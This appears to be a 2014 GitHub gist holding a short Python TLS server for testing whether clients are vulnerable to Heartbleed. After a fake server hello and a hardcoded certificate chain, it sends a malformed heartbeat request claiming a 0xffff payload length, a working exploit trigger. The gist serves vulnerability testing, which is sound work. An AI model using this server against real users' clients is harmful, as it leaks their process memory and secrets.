Skip to content

Instantly share code, notes, and snippets.

@thomaspatzke

thomaspatzke/openssl-heartbleed-server.py

Created April 9, 2014 15:10
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save thomaspatzke/10281460 to your computer and use it in GitHub Desktop.
Save thomaspatzke/10281460 to your computer and use it in GitHub Desktop.
Download ZIP
Very quick&dirty TLS server for testing if client implementations are affected by the Heartbleed vulnerability, before crypto (key exchange etc.) is established.
Raw
openssl-heartbleed-server.py
#!/usr/bin/python3
# openssl-heartbleed-server.py
# Check TLS clients for OpenSSL Heartbleed vulnerability.
import socketserver
import struct
import random
class HeartbleedServer(socketserver.BaseRequestHandler):
def handle(self):
tlsRecord = self.request.recv(5)
tlsType, tlsVersion, tlsLen = struct.unpack("!BHH", tlsRecord)
tlsClientHello = self.request.recv(tlsLen)
tlsServerHello = bytes.fromhex("02 00 00 2d") + struct.pack("!H", tlsVersion) + bytes.fromhex("".join([random.choice("0123456789abcdef") for i in range(64)]) + "00 00 2f 00 00 05 00 0f 00 01 01")
#tlsServerHello = bytes.fromhex("02 00 00 28") + struct.pack("!H", tlsVersion) + bytes.fromhex("".join([random.choice("0123456789abcdef") for i in range(64)]) + "00 00 2f 00 00 00")
tlsRecord = bytes.fromhex("16") + struct.pack("!H", tlsVersion) + struct.pack("!H", len(tlsServerHello)) + tlsServerHello
self.request.sendall(tlsRecord) # Server Hello
self.request.sendall(bytes.fromhex("16") + struct.pack("!H", tlsVersion) + bytes.fromhex("0cca0b000cc6000cc30004b8308204b43082039ca00302010202121121da02750f07be3b3a769119c4c55a97f2300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d7361312d302b06035504031324476c6f62616c5369676e20446f6d61696e2056616c69646174696f6e204341202d204732301e170d3131303833303130333035305a170d3134313031333137313430355a3048310b30090603550406130247423121301f060355040b1318446f6d61696e20436f6e74726f6c2056616c6964617465643116301406035504030c0d2a2e6f70656e73736c2e6f726730820122300d06092a864886f70d01010105000382010f003082010a0282010100b9234e1db5ef87b2ce43756ac3111cd2f732f3f7929bede686c3b793935e7d326a2b03b72ac8809891414008acdea67a7c4f448b9cd8d38771f24e3e54d7a41181b7716887c1c9af2afab274a370a14d19068d1c9504149c8f1ff098c1c070fab1101d77da801453a55cbe059a43f454f370f47139ea509ce6a8d078a6301e6d4d2210dd152d50005dd9c9d2a6b9db7fadd8ebef651fcebb8d4e5195846e9516ef0bf07bff2d6c1b816ccae0253d2a5c6fadce4b5c467cb1a9f4ea7202a1cc87638519520123048e2ab494de6d6913650b705f921a446841cd80efc9e983d81e9586c71a51af3daaca9719e0b4698775e1099a53cdf543cf2b1de781201e97250203010001a382018730820183300e0603551d0f0101ff0404030205a0304c0603551d2004453043304106092b06010401a032010a3034303206082b06010505070201162668747470733a2f2f7777772e676c6f62616c7369676e2e636f6d2f7265706f7369746f72792f30250603551d11041e301c820d2a2e6f70656e73736c2e6f7267820b6f70656e73736c2e6f726730090603551d1304023000301d0603551d250416301406082b0601050507030106082b06010505070302303f0603551d1f043830363034a032a030862e687474703a2f2f63726c2e676c6f62616c7369676e2e636f6d2f67732f6773646f6d61696e76616c67322e63726c305106082b0601050507010104453043304106082b060105050730028635687474703a2f2f7365637572652e676c6f62616c7369676e2e636f6d2f6361636572742f6773646f6d61696e76616c67322e637274301d0603551d0e04160414ec817d47a8c019a7bc6b525eb690fb17ae7f418f301f0603551d2304183016801496adfab05bb983642a76c21c8a69da42dcfefd28300d06092a864886f70d010105050003820101009e7e7fda256f233f641c9d0495d3fb903f25e24d37570d0b552a29513ff9235afad9ca7339960079b458bad99ab3ebd3c28861c8fa0e098595a50e27fd05d97321ed7d96a35541274b42518f0d764d6cc5f40078f71a11859eb144a2032f136ac26809287bd8b3152cb82705dfc2dc0c3f0ec594d7500040d61a4d429290fc5ed9081dce7079c3ac337a5545d8282438a00bcd754b3244a9bc16aee9325e875b93566d76f2fb6613017e879a08195b52934129aa833429f243e19a96bfb07028b88a483c5f55278aee3d229df2b82668181eaee037746b42c51601393f2e16ae88887bfef4aeb33475686dbfee5dcd9f247a3dc646efa2f51b5d1045bde739b3000379308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0000489308204853082036da003020102020b0400000000012f4ee13f11300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3131303431333130303030305a170d3232303431333130303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d7361312d302b06035504031324476c6f62616c5369676e20446f6d61696e2056616c69646174696f6e204341202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100b1a3cdc0df334026ebde5ad79466d40163cc334489e0e2b8c2470d8fad69861ca873420bf172fb2dacb511728322f656e72ec567719d001c32bce3ed2e0845a9e6faddc88c8305c16f4bd0264a0bf61b45c04d7e93bc0d2784ed30a3e9c62626dd2d1fd88bc3ce19d05bfc089fe4d8e235e4a068a6f60da3746042b29782248e41a4f22e5eb68ea76ed96c7f0d3b24356ad0ab5b6af79702003f51a6a76e73ca770d767c9bb6301a1a9cf71f287b0e8b471fe77f058cc6c9c8bbcfe9dc7a412ea186dad439b2e21340a6a83afa0f531e4fec6e98091bca9a77b3558585e92e16b59d5e54f14a7a6c39ba6e170634b3b242e1f7f39c9a0b1144de6a788eb1134f0203010001a38201503082014c300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020100301d0603551d0e0416041496adfab05bb983642a76c21c8a69da42dcfefd2830470603551d200440303e303c0604551d20003034303206082b06010505070201162668747470733a2f2f7777772e676c6f62616c7369676e2e636f6d2f7265706f7369746f72792f30330603551d1f042c302a3028a026a0248622687474703a2f2f63726c2e676c6f62616c7369676e2e6e65742f726f6f742e63726c303d06082b060105050701010431302f302d06082b060105050730018621687474703a2f2f6f6373702e676c6f62616c7369676e2e636f6d2f726f6f74723130290603551d250422302006082b0601050507030106082b06010505070302060a2b0601040182370a0303301f0603551d23041830168014607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d010105050003820101007e9a13397169a0fc8c35acafb4d6de64ea336f95539271ad4cc0fbd06bba800ec20ae637fad225a322f7899f5212432fbbc4fc6ccee4aa9df69d577bcc2aac75491b5466cfa7e9b9b0c27c7023fb9c9700f225a4d9a10a5d85061d1a87f52d54c564218eacaaec193e9bffc067a72e00e3f18140005b83e2a8a7ef355083c0f49b882a89a9a99c2f82b9189efaeb47246e13eeb28cf042375ee68f91bca55f512baebb8c76314e531179ec114e3873e51a6670f482f77b1055f8bba5c31de5d3f6bcfa28b63110d5fe9123a4213fba4c918f87c782ab38c2017389481af90c91b995fb6d215f03c8bf7b74ef7b7179b53e7323d15adca60ce12d646591bec2b9"))
self.request.sendall(bytes.fromhex("18") + struct.pack("!H", tlsVersion) + bytes.fromhex("00 03 01 ff ff")) # Heartbeat request
### Main ###
server = socketserver.TCPServer(("", 4433), HeartbleedServer)
server.serve_forever()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment